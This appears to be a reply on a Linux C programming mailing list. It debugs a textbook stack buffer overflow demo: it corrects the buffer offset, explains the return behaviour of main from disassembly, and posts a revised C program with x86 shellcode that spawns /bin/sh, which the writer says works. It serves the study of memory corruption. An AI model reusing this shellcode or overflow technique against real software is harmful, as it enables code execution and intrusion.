>         "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
> 
> #endif
> 
> char large_string[128];

the string is not _large_ enough. in my Linux box, it takes about 132 bytes
from buffer to return address,which means, you just filled part of the stack with
junk bytes after large_string+127 instead of &buffer

> int main() {
>   char buffer[96];
>   int i;
>   long *long_ptr = (long *) large_string;
>   memset(&buffer,0,sizeof(buffer));
> 
>   for (i = 0; i < 32; i++)
>     *(long_ptr + i) =  (long)&buffer;
> 
>   for (i = 0; i < strlen(shellcode); i++)
>     large_string[i] = shellcode[i];
> 
>   strcpy(buffer,large_string);
> }

the return behavior of "main" is somewhat different from any other plain
functons. And below is taken from my program. 


 804846f:	e8 cc fe ff ff       	call   8048340 <strcpy@plt>
 8048474:	83 ec 80             	sub    $0xffffff80,%esp
 8048477:	59                   	pop    %ecx
 8048478:	5b                   	pop    %ebx
 8048479:	5d                   	pop    %ebp
 804847a:	8d 61 fc             	lea    -0x4(%ecx),%esp
 804847d:	c3                   	ret    

We can see that it's not direct "pop" of the stack, 
the stack is adjusted with "lea" just before the "ret",
so your shellcode address is not filled into the "eip" but to "esp"! 

And at last, here is my modified version (sucessfully got a shell in my box)
of your test program:



#include <stdio.h>
#include <string.h>

char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x06\xcd\x80"
"\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80"
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
#if 0
char shellcode[] =
        "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
        "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
        "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
        "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

#endif

char large_string[256];
int foo() {
  char buffer[96];
  int i;
  long *long_ptr = (long *) large_string;
  memset(&buffer,0,sizeof(buffer));

  for (i = 0; i < 256/4; i++)
    *(long_ptr + i) =  (long)&buffer;

  for (i = 0; i < strlen(shellcode); i++)
    large_string[i] = shellcode[i];

  strcpy(buffer,large_string);
}

int main()
{
	foo();
}




> 
> --
> To unsubscribe from this list: send the line "unsubscribe linux-c-programming" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html

----- End forwarded message -----